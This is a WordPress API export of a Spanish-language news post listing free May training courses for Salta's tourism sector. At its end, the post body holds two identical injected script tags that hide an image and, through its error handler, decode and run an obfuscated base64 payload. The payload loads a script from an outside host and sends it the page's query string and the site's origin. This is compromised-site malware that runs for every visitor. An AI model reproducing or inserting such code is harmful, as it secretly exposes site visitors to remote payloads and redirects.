{"id":3962,"date":"2024-05-06T20:03:45","date_gmt":"2024-05-06T23:03:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3962"},"modified":"2025-08-13T23:56:30","modified_gmt":"2025-08-14T02:56:30","slug":"continuan-en-mayo-las-capacitaciones-gratuitas-al-sector-turistico","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3962","title":{"rendered":"Contin\u00faan en mayo las capacitaciones gratuitas al sector tur\u00edstico"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-327892744acf2b266074a7f5c1bd51f8\" style=\"background-color:#850727\"><em>A trav\u00e9s del Plan Integral de Capacitaci\u00f3n del Ministerio de Turismo y Deportes, personas del sector p\u00fablico y privado vinculado a la actividad pueden formarse con modalidad virtual o presencial.<\/em><\/h4>\n\n\n\n<p>El&nbsp;<strong>Ministerio de Turismo y Deportes de Salta<\/strong>, en el marco del Plan Integral de Capacitaci\u00f3n: Hacia un destino sostenible, pone a disposici\u00f3n del sector p\u00fablico y privado del \u00e1mbito tur\u00edstico, cursos gratuitos de modalidades presenciales, virtuales y asincr\u00f3nicas. Los interesados deben inscribirse en&nbsp;<a href=\"http:\/\/www.turismotecapacita.com\/\">www.turismotecapacita.com<\/a><\/p>\n\n\n\n<p>Cabe destacar que los cursos desarrollados y grabados en a\u00f1os anteriores, se ponen a disposici\u00f3n del sector tur\u00edstico bajo la modalidad asincr\u00f3nica. Esta modalidad permite acceder al curso, a partir de la fecha de publicaci\u00f3n y ver los contenidos en el horario que les resulte m\u00e1s conveniente y cuantas veces lo deseen, por el t\u00e9rmino de una semana.&nbsp;<\/p>\n\n\n\n<p><strong>Durante mayo se publicar\u00e1n los siguientes cursos:<\/strong><\/p>\n\n\n\n<p>\u2022 Ferias con Identidad: 6 de mayo al 5 de agosto, Dictado por: Marcela Ruiz, destinado a referentes e informantes municipales de turismo.<\/p>\n\n\n\n<p><strong>\u2022 Anfitriones de Destino:<\/strong><\/p>\n\n\n\n<p>M\u00f3dulo IV, Anfitriones de Destino. T\u00e9cnicas de Interpretaci\u00f3n aplicadas al circuito: 30 de abril al 7 de mayo<\/p>\n\n\n\n<p>M\u00f3dulo V, presentaci\u00f3n y evaluaci\u00f3n de las rutas tem\u00e1ticas presentadas: 7 al 14 de mayo.<\/p>\n\n\n\n<p>A cargo de Ver\u00f3nica Velardo, destinado a Gu\u00edas y Prestadores Tur\u00edsticos.<\/p>\n\n\n\n<p>\u2022 Paso a paso Google Maps: 9 al 16 de mayo,<\/p>\n\n\n\n<p>\u2022 Paso a paso c\u00f3mo comercializar mis emprendimientos: 23 al 30 de mayo<\/p>\n\n\n\n<p>A cargo de Cecilia Camou, destinado a emprendedores tur\u00edsticos<\/p>\n\n\n\n<p>\u2022 C\u00f3mo crear negocios de \u00e9xito: 16 al 23 de mayo. A cargo de Jorge Lindon, destinado a emprendedores tur\u00edsticos.<\/p>\n\n\n\n<p>\u2022 Tips para emprender en turismo con \u00e9xito: 30 de mayo al 6 de junio. A cargo de Marcelo Paz, destinado a emprendedores tur\u00edsticos.<\/p>\n\n\n\n<p><strong>Cursos Presenciales y Virtuales<\/strong><\/p>\n\n\n\n<p>Mi\u00e9rcoles 14: Jornada de Sensibilizaci\u00f3n Turismo y Riesgo Clim\u00e1tico, destinado a &nbsp; prestadores del sector tur\u00edstico de la provincia. La capacitaci\u00f3n estar\u00e1 a cargo de Constanza Pelleschi, Punto Focal en Cambio Clim\u00e1tico de la Secretaria de Ambiente y Desarrollo Sustentable. Modalidad Virtual.<\/p>\n\n\n\n<p>Mi\u00e9rcoles 14 y viernes 17: Portugu\u00e9s para Turismo, se dictar\u00e1n todos los martes y jueves el nivel inicial y todos los viernes el nivel avanzado. Destinado a Gu\u00edas y prestadores del sector Tur\u00edstico. Modalidad virtual<\/p>\n\n\n\n<p>Mi\u00e9rcoles 15 y viernes 24: \u00bfQueres ser parte del Turismo de Reuniones? con el objeto de que los participantes conozcan los beneficios y el impacto del Turismo de Reuniones en los destinos sede de Eventos, se realizar\u00e1 esta capacitaci\u00f3n el d\u00eda 15 en Salta Capital y el d\u00eda 24 en Cafayate. Modalidad presencial.<\/p>\n\n\n\n<p>Mi\u00e9rcoles 15 y viernes 31: Salta y sus aspectos distintivos. Oferta de experiencias tur\u00edsticas se brindar\u00e1 informaci\u00f3n sobre la nueva oferta de productos y servicios del Destino Salta a estudiantes del nivel secundario del Colegio Secundario Reyes Cat\u00f3licos N\u00ba 5028 y estudiantes de turismo del Profesorado Lenguas Vivas N\u00ba 6007. Modalidad presencial.<\/p>\n\n\n\n<p>Jueves 16 y viernes 17: Iniciaci\u00f3n a la Observaci\u00f3n de Aves, destinados a gu\u00edas y prestadores de Turismo Aventura de la localidad de Seclant\u00e1s. Modalidad presencial.<\/p>\n\n\n\n<p>Jueves 23, jueves 30 y viernes 31: Primeros Auxilios a cargo del Dr. Rodolfo Pastore, destinado a Prestadores del Sector Tur\u00edstico. Salta Capital jueves 23 y viernes 31, La Caldera jueves 30. &nbsp;Modalidad presencial.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/continuan-en-mayo-las-capacitaciones-gratuitas-al-sector-turistico-95497\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>A trav\u00e9s del Plan Integral de Capacitaci\u00f3n del Ministerio de Turismo y Deportes, personas del sector p\u00fablico y privado vinculado a la actividad pueden formarse con modalidad virtual o presencial. El&nbsp;Ministerio de Turismo y Deportes de Salta, en el marco del Plan Integral de Capacitaci\u00f3n: Hacia un destino sostenible, pone a disposici\u00f3n del sector p\u00fablico [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3963,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,15],"tags":[],"class_list":{"0":"post-3962","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3962"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3962"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3962\/revisions"}],"predecessor-version":[{"id":6794,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3962\/revisions\/6794"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3963"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3962"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3962"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3962"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}